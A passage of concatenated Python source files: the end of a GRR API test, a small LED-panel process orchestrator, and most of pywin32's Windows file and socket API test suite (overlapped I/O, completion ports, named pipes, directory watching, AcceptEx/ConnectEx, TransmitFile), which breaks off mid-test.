type=rdf_artifacts.ArtifactSource.SourceType.FILE,
attributes={
"paths": [os.path.join(self.base_path, "numbers.txt")],
})
artifact = rdf_artifacts.Artifact(
name="FakeArtifact", sources=[source], doc="fake artifact doc")
registry_stub.RegisterArtifact(artifact)
client_ref = self.api.Client(client_id=self.client_id)
with mock.patch.object(artifact_registry, "REGISTRY", registry_stub):
args = rdf_artifacts.ArtifactCollectorFlowArgs(
artifact_list=["FakeArtifact"]).AsPrimitiveProto()
client_ref.CreateFlow(
name=collectors.ArtifactCollectorFlow.__name__, args=args)
client_mock = action_mocks.FileFinderClientMock()
flow_test_lib.FinishAllFlowsOnClient(
self.client_id, client_mock=client_mock)
f = client_ref.File("fs/os" +
os.path.join(self.base_path, "numbers.txt")).Get()
self.assertNotEqual(f.data.hash.sha256, b"")
self.assertGreater(f.data.hash.num_bytes, 0)
self.assertGreater(f.data.last_collected, 0)
self.assertGreater(f.data.last_collected_size, 0)
def testGetTimeline(self):
timeline = self.api.Client(
client_id=self.client_id).File("fs/os").GetTimeline()
self.assertTrue(timeline)
for item in timeline:
self.assertIsInstance(item, vfs_pb2.ApiVfsTimelineItem)
def testGetTimelineAsCsv(self):
out = io.BytesIO()
self.api.Client(client_id=self.client_id).File(
"fs/os").GetTimelineAsCsv().WriteToStream(out)
self.assertTrue(out.getvalue())
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
app.run(main)
|
shobaleader.py
|
from multiprocessing import Process
from lib.panel import Panel
class Shobaleader:
"""Orchestrator of the whole thing."""
def __init__(self):
"""Construct."""
self.panel = Panel()
self.performer_class = None
self.args = None
self.process = None
def render(self):
"""Put the frames on the panel."""
performer = self.performer_class(**self.args)
for frame in performer.perform():
self.panel.display(frame)
def run(self, performer_class, **kwargs):
"""Control the process."""
if performer_class == self.performer_class and kwargs == self.args:
return # nocov
self.performer_class = performer_class
self.args = kwargs
self.stop()
self.process = Process(target=self.render)
self.process.start()
def stop(self):
"""Stop the running process."""
if self.process:
self.process.terminate()
|
test_win32file.py
|
import unittest
from pywin32_testutil import str2bytes, TestSkipped, testmain
import win32api, win32file, win32pipe, pywintypes, winerror, win32event
import win32con, ntsecuritycon
import sys
import os
import tempfile
import threading
import time
import shutil
import socket
import datetime
import random
import win32timezone
try:
set
except NameError:
from sets import Set as set
class TestReadBuffer(unittest.TestCase):
def testLen(self):
buffer = win32file.AllocateReadBuffer(1)
self.failUnlessEqual(len(buffer), 1)
def testSimpleIndex(self):
buffer = win32file.AllocateReadBuffer(1)
buffer[0] = 0xFF
self.assertEqual(buffer[0], 0xFF)
def testSimpleSlice(self):
buffer = win32file.AllocateReadBuffer(2)
val = str2bytes("\0\0")
buffer[:2] = val
self.failUnlessEqual(buffer[0:2], val)
class TestSimpleOps(unittest.TestCase):
def testSimpleFiles(self):
fd, filename = tempfile.mkstemp()
os.close(fd)
os.unlink(filename)
handle = win32file.CreateFile(
filename, win32file.GENERIC_WRITE, 0, None, win32con.CREATE_NEW, 0, None
)
test_data = str2bytes("Hello\0there")
try:
win32file.WriteFile(handle, test_data)
handle.Close()
# Try and open for read
handle = win32file.CreateFile(
filename,
win32file.GENERIC_READ,
0,
None,
win32con.OPEN_EXISTING,
0,
None,
)
rc, data = win32file.ReadFile(handle, 1024)
self.assertEquals(data, test_data)
finally:
handle.Close()
try:
os.unlink(filename)
except os.error:
pass
# A simple test using normal read/write operations.
def testMoreFiles(self):
# Create a file in the %TEMP% directory.
testName = os.path.join(win32api.GetTempPath(), "win32filetest.dat")
desiredAccess = win32file.GENERIC_READ | win32file.GENERIC_WRITE
# Set a flag to delete the file automatically when it is closed.
fileFlags = win32file.FILE_FLAG_DELETE_ON_CLOSE
h = win32file.CreateFile(
testName,
desiredAccess,
win32file.FILE_SHARE_READ,
None,
win32file.CREATE_ALWAYS,
fileFlags,
0,
)
# Write a known number of bytes to the file.
data = str2bytes("z") * 1025
win32file.WriteFile(h, data)
self.failUnless(
win32file.GetFileSize(h) == len(data),
"WARNING: Written file does not have the same size as the length of the data in it!",
)
# Ensure we can read the data back.
win32file.SetFilePointer(h, 0, win32file.FILE_BEGIN)
hr, read_data = win32file.ReadFile(
h, len(data) + 10
) # + 10 to get anything extra
self.failUnless(hr == 0, "Readfile returned %d" % hr)
self.failUnless(read_data == data, "Read data is not what we wrote!")
# Now truncate the file at 1/2 its existing size.
newSize = len(data) // 2
win32file.SetFilePointer(h, newSize, win32file.FILE_BEGIN)
win32file.SetEndOfFile(h)
self.failUnlessEqual(win32file.GetFileSize(h), newSize)
# GetFileAttributesEx/GetFileAttributesExW tests.
self.failUnlessEqual(
win32file.GetFileAttributesEx(testName),
win32file.GetFileAttributesExW(testName),
)
attr, ct, at, wt, size = win32file.GetFileAttributesEx(testName)
self.failUnless(
size == newSize,
"Expected GetFileAttributesEx to return the same size as GetFileSize()",
)
self.failUnless(
attr == win32file.GetFileAttributes(testName),
"Expected GetFileAttributesEx to return the same attributes as GetFileAttributes",
)
h = None # Close the file by removing the last reference to the handle!
self.failUnless(
not os.path.isfile(testName), "After closing the file, it still exists!"
)
def testFilePointer(self):
# via [ 979270 ] SetFilePointer fails with negative offset
# Create a file in the %TEMP% directory.
filename = os.path.join(win32api.GetTempPath(), "win32filetest.dat")
f = win32file.CreateFile(
filename,
win32file.GENERIC_READ | win32file.GENERIC_WRITE,
0,
None,
win32file.CREATE_ALWAYS,
win32file.FILE_ATTRIBUTE_NORMAL,
0,
)
try:
# Write some data
data = str2bytes("Some data")
(res, written) = win32file.WriteFile(f, data)
self.failIf(res)
self.assertEqual(written, len(data))
# Move at the beginning and read the data
win32file.SetFilePointer(f, 0, win32file.FILE_BEGIN)
(res, s) = win32file.ReadFile(f, len(data))
self.failIf(res)
self.assertEqual(s, data)
# Move at the end and read the data
win32file.SetFilePointer(f, -len(data), win32file.FILE_END)
(res, s) = win32file.ReadFile(f, len(data))
self.failIf(res)
self.failUnlessEqual(s, data)
finally:
f.Close()
os.unlink(filename)
def testFileTimesTimezones(self):
filename = tempfile.mktemp("-testFileTimes")
# now() is always returning a timestamp with microseconds but the
# file APIs all have zero microseconds, so some comparisons fail.
now_utc = win32timezone.utcnow().replace(microsecond=0)
now_local = now_utc.astimezone(win32timezone.TimeZoneInfo.local())
h = win32file.CreateFile(
filename,
win32file.GENERIC_READ | win32file.GENERIC_WRITE,
0,
None,
win32file.CREATE_ALWAYS,
0,
0,
)
try:
win32file.SetFileTime(h, now_utc, now_utc, now_utc)
ct, at, wt = win32file.GetFileTime(h)
self.failUnlessEqual(now_local, ct)
self.failUnlessEqual(now_local, at)
self.failUnlessEqual(now_local, wt)
# and the reverse - set local, check against utc
win32file.SetFileTime(h, now_local, now_local, now_local)
ct, at, wt = win32file.GetFileTime(h)
self.failUnlessEqual(now_utc, ct)
self.failUnlessEqual(now_utc, at)
self.failUnlessEqual(now_utc, wt)
finally:
h.close()
os.unlink(filename)
def testFileTimes(self):
from win32timezone import TimeZoneInfo
# now() is always returning a timestamp with microseconds but the
# file APIs all have zero microseconds, so some comparisons fail.
now = datetime.datetime.now(tz=TimeZoneInfo.utc()).replace(microsecond=0)
nowish = now + datetime.timedelta(seconds=1)
later = now + datetime.timedelta(seconds=120)
filename = tempfile.mktemp("-testFileTimes")
# Windows docs the 'last time' isn't valid until the last write
# handle is closed - so create the file, then re-open it to check.
open(filename, "w").close()
f = win32file.CreateFile(
filename,
win32file.GENERIC_READ | win32file.GENERIC_WRITE,
0,
None,
win32con.OPEN_EXISTING,
0,
None,
)
try:
ct, at, wt = win32file.GetFileTime(f)
self.failUnless(
ct >= now,
"File was created in the past - now=%s, created=%s" % (now, ct),
)
self.failUnless(now <= ct <= nowish, (now, ct))
self.failUnless(
wt >= now,
"File was written-to in the past now=%s, written=%s" % (now, wt),
)
self.failUnless(now <= wt <= nowish, (now, wt))
# Now set the times.
win32file.SetFileTime(f, later, later, later, UTCTimes=True)
# Get them back.
ct, at, wt = win32file.GetFileTime(f)
# XXX - the builtin PyTime type appears to be out by a dst offset.
# just ignore that type here...
self.failUnlessEqual(ct, later)
self.failUnlessEqual(at, later)
self.failUnlessEqual(wt, later)
finally:
f.Close()
os.unlink(filename)
class TestGetFileInfoByHandleEx(unittest.TestCase):
__handle = __filename = None
def setUp(self):
fd, self.__filename = tempfile.mkstemp()
os.close(fd)
def tearDown(self):
if self.__handle is not None:
self.__handle.Close()
if self.__filename is not None:
try:
os.unlink(self.__filename)
except OSError:
pass
self.__handle = self.__filename = None
def testFileBasicInfo(self):
attr = win32file.GetFileAttributes(self.__filename)
f = win32file.CreateFile(
self.__filename,
win32file.GENERIC_READ,
0,
None,
win32con.OPEN_EXISTING,
0,
None,
)
self.__handle = f
ct, at, wt = win32file.GetFileTime(f)
# bug #752: this throws ERROR_BAD_LENGTH (24) in x86 binaries of build 221
basic_info = win32file.GetFileInformationByHandleEx(f, win32file.FileBasicInfo)
self.assertEqual(ct, basic_info["CreationTime"])
self.assertEqual(at, basic_info["LastAccessTime"])
self.assertEqual(wt, basic_info["LastWriteTime"])
self.assertEqual(attr, basic_info["FileAttributes"])
class TestOverlapped(unittest.TestCase):
def testSimpleOverlapped(self):
# Create a file in the %TEMP% directory.
import win32event
testName = os.path.join(win32api.GetTempPath(), "win32filetest.dat")
desiredAccess = win32file.GENERIC_WRITE
overlapped = pywintypes.OVERLAPPED()
evt = win32event.CreateEvent(None, 0, 0, None)
overlapped.hEvent = evt
        # Create the file and write a large amount of data to it.
h = win32file.CreateFile(
testName, desiredAccess, 0, None, win32file.CREATE_ALWAYS, 0, 0
)
chunk_data = str2bytes("z") * 0x8000
num_loops = 512
expected_size = num_loops * len(chunk_data)
for i in range(num_loops):
win32file.WriteFile(h, chunk_data, overlapped)
win32event.WaitForSingleObject(overlapped.hEvent, win32event.INFINITE)
overlapped.Offset = overlapped.Offset + len(chunk_data)
h.Close()
# Now read the data back overlapped
overlapped = pywintypes.OVERLAPPED()
evt = win32event.CreateEvent(None, 0, 0, None)
overlapped.hEvent = evt
desiredAccess = win32file.GENERIC_READ
h = win32file.CreateFile(
testName, desiredAccess, 0, None, win32file.OPEN_EXISTING, 0, 0
)
buffer = win32file.AllocateReadBuffer(0xFFFF)
while 1:
try:
hr, data = win32file.ReadFile(h, buffer, overlapped)
win32event.WaitForSingleObject(overlapped.hEvent, win32event.INFINITE)
overlapped.Offset = overlapped.Offset + len(data)
                if data is not buffer:
self.fail(
"Unexpected result from ReadFile - should be the same buffer we passed it"
)
except win32api.error:
break
h.Close()
def testCompletionPortsMultiple(self):
# Mainly checking that we can "associate" an existing handle. This
# failed in build 203.
ioport = win32file.CreateIoCompletionPort(
win32file.INVALID_HANDLE_VALUE, 0, 0, 0
)
socks = []
for PORT in range(9123, 9125):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("", PORT))
sock.listen(1)
socks.append(sock)
new = win32file.CreateIoCompletionPort(sock.fileno(), ioport, PORT, 0)
assert new is ioport
for s in socks:
s.close()
hv = int(ioport)
ioport = new = None
# The handle itself should be closed now (unless we leak references!)
# Check that.
try:
win32file.CloseHandle(hv)
raise RuntimeError("Expected close to fail!")
except win32file.error as details:
self.failUnlessEqual(details.winerror, winerror.ERROR_INVALID_HANDLE)
def testCompletionPortsQueued(self):
class Foo:
pass
io_req_port = win32file.CreateIoCompletionPort(-1, None, 0, 0)
overlapped = pywintypes.OVERLAPPED()
overlapped.object = Foo()
win32file.PostQueuedCompletionStatus(io_req_port, 0, 99, overlapped)
errCode, bytes, key, overlapped = win32file.GetQueuedCompletionStatus(
io_req_port, win32event.INFINITE
)
self.failUnlessEqual(errCode, 0)
self.failUnless(isinstance(overlapped.object, Foo))
def _IOCPServerThread(self, handle, port, drop_overlapped_reference):
overlapped = pywintypes.OVERLAPPED()
win32pipe.ConnectNamedPipe(handle, overlapped)
if drop_overlapped_reference:
# Be naughty - the overlapped object is now dead, but
# GetQueuedCompletionStatus will still find it. Our check of
# reference counting should catch that error.
overlapped = None
# even if we fail, be sure to close the handle; prevents hangs
# on Vista 64...
try:
self.failUnlessRaises(
RuntimeError, win32file.GetQueuedCompletionStatus, port, -1
)
finally:
handle.Close()
return
result = win32file.GetQueuedCompletionStatus(port, -1)
ol2 = result[-1]
self.failUnless(ol2 is overlapped)
data = win32file.ReadFile(handle, 512)[1]
win32file.WriteFile(handle, data)
def testCompletionPortsNonQueued(self, test_overlapped_death=0):
# In 204 we had a reference count bug when OVERLAPPED objects were
# associated with a completion port other than via
# PostQueuedCompletionStatus. This test is based on the reproduction
# reported with that bug.
# Create the pipe.
BUFSIZE = 512
pipe_name = r"\\.\pipe\pywin32_test_pipe"
handle = win32pipe.CreateNamedPipe(
pipe_name,
win32pipe.PIPE_ACCESS_DUPLEX | win32file.FILE_FLAG_OVERLAPPED,
win32pipe.PIPE_TYPE_MESSAGE
| win32pipe.PIPE_READMODE_MESSAGE
| win32pipe.PIPE_WAIT,
1,
BUFSIZE,
BUFSIZE,
win32pipe.NMPWAIT_WAIT_FOREVER,
None,
)
# Create an IOCP and associate it with the handle.
port = win32file.CreateIoCompletionPort(-1, 0, 0, 0)
win32file.CreateIoCompletionPort(handle, port, 1, 0)
t = threading.Thread(
target=self._IOCPServerThread, args=(handle, port, test_overlapped_death)
)
        t.daemon = True  # avoid hanging entire test suite on failure.
t.start()
try:
time.sleep(0.1) # let thread do its thing.
try:
win32pipe.CallNamedPipe(
r"\\.\pipe\pywin32_test_pipe", str2bytes("Hello there"), BUFSIZE, 0
)
except win32pipe.error:
# Testing for overlapped death causes this
if not test_overlapped_death:
raise
finally:
if not test_overlapped_death:
handle.Close()
t.join(3)
self.failIf(t.is_alive(), "thread didn't finish")
def testCompletionPortsNonQueuedBadReference(self):
self.testCompletionPortsNonQueued(True)
def testHashable(self):
overlapped = pywintypes.OVERLAPPED()
d = {}
d[overlapped] = "hello"
self.failUnlessEqual(d[overlapped], "hello")
def testComparable(self):
overlapped = pywintypes.OVERLAPPED()
self.failUnlessEqual(overlapped, overlapped)
# ensure we explicitly test the operators.
self.failUnless(overlapped == overlapped)
self.failIf(overlapped != overlapped)
def testComparable2(self):
# 2 overlapped objects compare equal if their contents are the same.
overlapped1 = pywintypes.OVERLAPPED()
overlapped2 = pywintypes.OVERLAPPED()
self.failUnlessEqual(overlapped1, overlapped2)
# ensure we explicitly test the operators.
self.failUnless(overlapped1 == overlapped2)
self.failIf(overlapped1 != overlapped2)
# now change something in one of them - should no longer be equal.
overlapped1.hEvent = 1
self.failIfEqual(overlapped1, overlapped2)
# ensure we explicitly test the operators.
self.failIf(overlapped1 == overlapped2)
self.failUnless(overlapped1 != overlapped2)
class TestSocketExtensions(unittest.TestCase):
def acceptWorker(self, port, running_event, stopped_event):
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.bind(("", port))
listener.listen(200)
# create accept socket
accepter = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# An overlapped
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
# accept the connection.
# We used to allow strings etc to be passed here, and they would be
# modified! Obviously this is evil :)
buffer = " " * 1024 # EVIL - SHOULD NOT BE ALLOWED.
self.assertRaises(
TypeError, win32file.AcceptEx, listener, accepter, buffer, overlapped
)
# This is the correct way to allocate the buffer...
buffer = win32file.AllocateReadBuffer(1024)
rc = win32file.AcceptEx(listener, accepter, buffer, overlapped)
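        # With overlapped I/O, ERROR_IO_PENDING is the expected return value here:
        # it means the accept was queued and will complete via overlapped.hEvent.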
self.failUnlessEqual(rc, winerror.ERROR_IO_PENDING)
# Set the event to say we are all ready
running_event.set()
# and wait for the connection.
rc = win32event.WaitForSingleObject(overlapped.hEvent, 2000)
if rc == win32event.WAIT_TIMEOUT:
self.fail("timed out waiting for a connection")
nbytes = win32file.GetOverlappedResult(listener.fileno(), overlapped, False)
# fam, loc, rem = win32file.GetAcceptExSockaddrs(accepter, buffer)
accepter.send(buffer[:nbytes])
# NOT set in a finally - this means *successfully* stopped!
stopped_event.set()
def testAcceptEx(self):
port = 4680
running = threading.Event()
stopped = threading.Event()
t = threading.Thread(target=self.acceptWorker, args=(port, running, stopped))
t.start()
running.wait(2)
        if not running.is_set():
self.fail("AcceptEx Worker thread failed to start")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", port))
win32file.WSASend(s, str2bytes("hello"), None)
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
# Like above - WSARecv used to allow strings as the receive buffer!!
buffer = " " * 10
self.assertRaises(TypeError, win32file.WSARecv, s, buffer, overlapped)
# This one should work :)
buffer = win32file.AllocateReadBuffer(10)
win32file.WSARecv(s, buffer, overlapped)
nbytes = win32file.GetOverlappedResult(s.fileno(), overlapped, True)
got = buffer[:nbytes]
self.failUnlessEqual(got, str2bytes("hello"))
# thread should have stopped
stopped.wait(2)
        if not stopped.is_set():
self.fail("AcceptEx Worker thread failed to successfully stop")
class TestFindFiles(unittest.TestCase):
def testIter(self):
dir = os.path.join(os.getcwd(), "*")
files = win32file.FindFilesW(dir)
set1 = set()
set1.update(files)
set2 = set()
for file in win32file.FindFilesIterator(dir):
set2.add(file)
assert len(set2) > 5, "This directory has less than 5 files!?"
self.failUnlessEqual(set1, set2)
def testBadDir(self):
dir = os.path.join(os.getcwd(), "a dir that doesnt exist", "*")
self.assertRaises(win32file.error, win32file.FindFilesIterator, dir)
def testEmptySpec(self):
spec = os.path.join(os.getcwd(), "*.foo_bar")
num = 0
for i in win32file.FindFilesIterator(spec):
num += 1
self.failUnlessEqual(0, num)
def testEmptyDir(self):
test_path = os.path.join(win32api.GetTempPath(), "win32file_test_directory")
try:
# Note: previously used shutil.rmtree, but when looking for
# reference count leaks, that function showed leaks! os.rmdir
# doesn't have that problem.
os.rmdir(test_path)
except os.error:
pass
os.mkdir(test_path)
try:
num = 0
for i in win32file.FindFilesIterator(os.path.join(test_path, "*")):
num += 1
# Expecting "." and ".." only
self.failUnlessEqual(2, num)
finally:
os.rmdir(test_path)
class TestDirectoryChanges(unittest.TestCase):
num_test_dirs = 1
def setUp(self):
self.watcher_threads = []
self.watcher_thread_changes = []
self.dir_names = []
self.dir_handles = []
for i in range(self.num_test_dirs):
td = tempfile.mktemp("-test-directory-changes-%d" % i)
os.mkdir(td)
self.dir_names.append(td)
hdir = win32file.CreateFile(
td,
ntsecuritycon.FILE_LIST_DIRECTORY,
win32con.FILE_SHARE_READ,
None, # security desc
win32con.OPEN_EXISTING,
win32con.FILE_FLAG_BACKUP_SEMANTICS | win32con.FILE_FLAG_OVERLAPPED,
None,
)
self.dir_handles.append(hdir)
changes = []
t = threading.Thread(
target=self._watcherThreadOverlapped, args=(td, hdir, changes)
)
t.start()
self.watcher_threads.append(t)
self.watcher_thread_changes.append(changes)
def _watcherThread(self, dn, dh, changes):
# A synchronous version:
# XXX - not used - I was having a whole lot of problems trying to
# get this to work. Specifically:
# * ReadDirectoryChangesW without an OVERLAPPED blocks infinitely.
# * If another thread attempts to close the handle while
# ReadDirectoryChangesW is waiting on it, the ::CloseHandle() method
# blocks (which has nothing to do with the GIL - it is correctly
# managed)
# Which ends up with no way to kill the thread!
        flags = win32con.FILE_NOTIFY_CHANGE_FILE_NAME
        while 1:
            print("waiting", dh)
            # The result must not shadow the `changes` list passed in by the caller,
            # otherwise the collected changes are silently lost.
            new_changes = win32file.ReadDirectoryChangesW(
                dh, 8192, False, flags  # sub-tree
            )
            print("got", new_changes)
            changes.extend(new_changes)
def _watcherThreadOverlapped(self, dn, dh, changes):
flags = win32con.FILE_NOTIFY_CHANGE_FILE_NAME
buf = win32file.AllocateReadBuffer(8192)
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
while 1:
win32file.ReadDirectoryChangesW(
dh, buf, False, flags, overlapped # sub-tree
)
# Wait for our event, or for 5 seconds.
rc = win32event.WaitForSingleObject(overlapped.hEvent, 5000)
if rc == win32event.WAIT_OBJECT_0:
# got some data! Must use GetOverlappedResult to find out
# how much is valid! 0 generally means the handle has
# been closed. Blocking is OK here, as the event has
# already been set.
nbytes = win32file.GetOverlappedResult(dh, overlapped, True)
if nbytes:
bits = win32file.FILE_NOTIFY_INFORMATION(buf, nbytes)
changes.extend(bits)
else:
# This is "normal" exit - our 'tearDown' closes the
# handle.
# print "looks like dir handle was closed!"
return
else:
print("ERROR: Watcher thread timed-out!")
return # kill the thread!
def tearDown(self):
# be careful about raising errors at teardown!
for h in self.dir_handles:
# See comments in _watcherThread above - this appears to
# deadlock if a synchronous ReadDirectoryChangesW is waiting...
# (No such problems with an asynch ReadDirectoryChangesW)
h.Close()
for dn in self.dir_names:
try:
shutil.rmtree(dn)
except OSError:
print("FAILED to remove directory", dn)
for t in self.watcher_threads:
# closing dir handle should have killed threads!
t.join(5)
if t.is_alive():
print("FAILED to wait for thread termination")
def stablize(self):
time.sleep(0.5)
def testSimple(self):
self.stablize()
for dn in self.dir_names:
fn = os.path.join(dn, "test_file")
open(fn, "w").close()
self.stablize()
changes = self.watcher_thread_changes[0]
self.failUnlessEqual(changes, [(1, "test_file")])
def testSmall(self):
self.stablize()
for dn in self.dir_names:
fn = os.path.join(dn, "x")
open(fn, "w").close()
self.stablize()
changes = self.watcher_thread_changes[0]
self.failUnlessEqual(changes, [(1, "x")])
class TestEncrypt(unittest.TestCase):
def testEncrypt(self):
fname = tempfile.mktemp("win32file_test")
f = open(fname, "wb")
f.write(str2bytes("hello"))
f.close()
f = None
try:
try:
win32file.EncryptFile(fname)
except win32file.error as details:
if details.winerror != winerror.ERROR_ACCESS_DENIED:
raise
print("It appears this is not NTFS - cant encrypt/decrypt")
win32file.DecryptFile(fname)
finally:
if f is not None:
f.close()
os.unlink(fname)
class TestConnect(unittest.TestCase):
def connect_thread_runner(self, expect_payload, giveup_event):
# As Windows 2000 doesn't do ConnectEx, we need to use a non-blocking
# accept, as our test connection may never come. May as well use
# AcceptEx for this...
listener = socket.socket()
self.addr = ("localhost", random.randint(10000, 64000))
listener.bind(self.addr)
listener.listen(1)
# create accept socket
accepter = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# An overlapped
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
# accept the connection.
if expect_payload:
buf_size = 1024
else:
# when we don't expect data we must be careful to only pass the
# exact number of bytes for the endpoint data...
buf_size = win32file.CalculateSocketEndPointSize(listener)
buffer = win32file.AllocateReadBuffer(buf_size)
win32file.AcceptEx(listener, accepter, buffer, overlapped)
# wait for the connection or our test to fail.
events = giveup_event, overlapped.hEvent
rc = win32event.WaitForMultipleObjects(events, False, 2000)
if rc == win32event.WAIT_TIMEOUT:
self.fail("timed out waiting for a connection")
if rc == win32event.WAIT_OBJECT_0:
# Our main thread running the test failed and will never connect.
return
# must be a connection.
nbytes = win32file.GetOverlappedResult(listener.fileno(), overlapped, False)
if expect_payload:
self.request = buffer[:nbytes]
accepter.send(str2bytes("some expected response"))
def test_connect_with_payload(self):
giveup_event = win32event.CreateEvent(None, 0, 0, None)
t = threading.Thread(
target=self.connect_thread_runner, args=(True, giveup_event)
)
t.start()
time.sleep(0.1)
s2 = socket.socket()
ol = pywintypes.OVERLAPPED()
s2.bind(("0.0.0.0", 0)) # connectex requires the socket be bound beforehand
try:
win32file.ConnectEx(s2, self.addr, ol, str2bytes("some expected request"))
except win32file.error as exc:
win32event.SetEvent(giveup_event)
if exc.winerror == 10022: # WSAEINVAL
raise TestSkipped("ConnectEx is not available on this platform")
            raise  # some error we don't expect.
# We occasionally see ERROR_CONNECTION_REFUSED in automation
try:
win32file.GetOverlappedResult(s2.fileno(), ol, 1)
except win32file.error as exc:
win32event.SetEvent(giveup_event)
if exc.winerror == winerror.ERROR_CONNECTION_REFUSED:
raise TestSkipped("Assuming ERROR_CONNECTION_REFUSED is transient")
raise
ol = pywintypes.OVERLAPPED()
buff = win32file.AllocateReadBuffer(1024)
win32file.WSARecv(s2, buff, ol, 0)
length = win32file.GetOverlappedResult(s2.fileno(), ol, 1)
self.response = buff[:length]
self.assertEqual(self.response, str2bytes("some expected response"))
self.assertEqual(self.request, str2bytes("some expected request"))
t.join(5)
self.failIf(t.is_alive(), "worker thread didn't terminate")
def test_connect_without_payload(self):
giveup_event = win32event.CreateEvent(None, 0, 0, None)
t = threading.Thread(
target=self.connect_thread_runner, args=(False, giveup_event)
)
t.start()
time.sleep(0.1)
s2 = socket.socket()
ol = pywintypes.OVERLAPPED()
s2.bind(("0.0.0.0", 0)) # connectex requires the socket be bound beforehand
try:
win32file.ConnectEx(s2, self.addr, ol)
except win32file.error as exc:
win32event.SetEvent(giveup_event)
if exc.winerror == 10022: # WSAEINVAL
raise TestSkipped("ConnectEx is not available on this platform")
            raise  # some error we don't expect.
# We occasionally see ERROR_CONNECTION_REFUSED in automation
try:
win32file.GetOverlappedResult(s2.fileno(), ol, 1)
except win32file.error as exc:
win32event.SetEvent(giveup_event)
if exc.winerror == winerror.ERROR_CONNECTION_REFUSED:
raise TestSkipped("Assuming ERROR_CONNECTION_REFUSED is transient")
raise
ol = pywintypes.OVERLAPPED()
buff = win32file.AllocateReadBuffer(1024)
win32file.WSARecv(s2, buff, ol, 0)
length = win32file.GetOverlappedResult(s2.fileno(), ol, 1)
self.response = buff[:length]
self.assertEqual(self.response, str2bytes("some expected response"))
t.join(5)
self.failIf(t.is_alive(), "worker thread didn't terminate")
class TestTransmit(unittest.TestCase):
def test_transmit(self):
import binascii
bytes = os.urandom(1024 * 1024)
val = binascii.hexlify(bytes)
val_length = len(val)
f = tempfile.TemporaryFile()
f.write(val)
def runner():
s1 = socket.socket()
# binding fails occasionally on github CI with:
# OSError: [WinError 10013] An attempt was made to access a socket in a way forbidden by its access permissions
# which probably just means the random port is already in use, so
# let that happen a few times.
for i in range(5):
self.addr = ("localhost", random.randint(10000, 64000))
try:
s1.bind(self.addr)
break
except os.error as exc:
if exc.winerror != 10013:
raise
print("Failed to use port", self.addr, "trying another random one")
else:
raise RuntimeError("Failed to find an available port to bind to.")
s1.listen(1)
cli, addr = s1.accept()
buf = 1
self.request = []
while buf:
buf = cli.recv(1024 * 100)
self.request.append(buf)
th = threading.Thread(target=runner)
th.start()
time.sleep(0.5)
s2 = socket.socket()
s2.connect(self.addr)
length = 0
aaa = str2bytes("[AAA]")
bbb = str2bytes("[BBB]")
ccc = str2bytes("[CCC]")
ddd = str2bytes("[DDD]")
empty = str2bytes("")
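        # The two optional trailing arguments to TransmitFile below are "head" and
        # "tail" buffers: the head is sent before the file contents and the tail
        # after it, which is exactly what the `expected` concatenation at the end
        # of this test checks.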
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(
s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0
)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(
s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, aaa, bbb
)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(
s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, empty, empty
)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(
s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, None, ccc
)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(
s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, ddd
)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
s2.close()
th.join()
buf = str2bytes("").join(self.request)
self.assertEqual(length, len(buf))
expected = val + aaa + val + bbb + val + val + ccc + ddd + val
self.assertEqual(type(expected), type(buf))
self.assert_(expected == buf)
class TestWSAEnumNetworkEvents(unittest.TestCase):
def test_basics(self):
s = socket.socket()
e = win32event.CreateEvent(None, 1, 0, None)
win32file.WSAEventSelect(s, e, 0)
self.assertEquals(win32file.WSAEnumNetworkEvents(s), {})
self.assertEquals(win32file.WSAEnumNetworkEvents(s, e), {})
self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, s, e, 3)
self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, s, "spam")
self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, "spam", e)
self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, "spam")
f = open("NUL")
h = win32file._get_osfhandle(f.fileno())
self.assertRaises(win32file.error, win32file.WSAEnumNetworkEvents, h)
self.assertRaises(win32file.error, win32file.WSAEnumNetworkEvents, s, h)
try:
win32file.WSAEnumNetworkEvents(h)
except win32file.error as e:
self.assertEquals(e.winerror, win32file.WSAENOTSOCK)
try:
win32file.WSAEnumNetworkEvents(s, h)
except win32file.error as e:
# According to the docs it would seem reasonable that
# this would fail with WSAEINVAL, but it doesn't.
self.assertEquals(e.winerror, win32file.WSAENOTSOCK)
def test_functional(self):
# This is not really a unit test, but it does exercise the code
# quite well and can serve as an example of WSAEventSelect and
# WSAEnumNetworkEvents usage.
port = socket.socket()
port.setblocking(0)
port_event = win32event.CreateEvent(None, 0, 0, None)
win32file.WSAEventSelect(
port, port_event, win32file.FD_ACCEPT | win32file.FD_CLOSE
)
port.bind(("127.0.0.1", 0))
port.listen(10)
client = socket.socket()
client.setblocking(0)
client_event = win32event.CreateEvent(None, 0, 0, None)
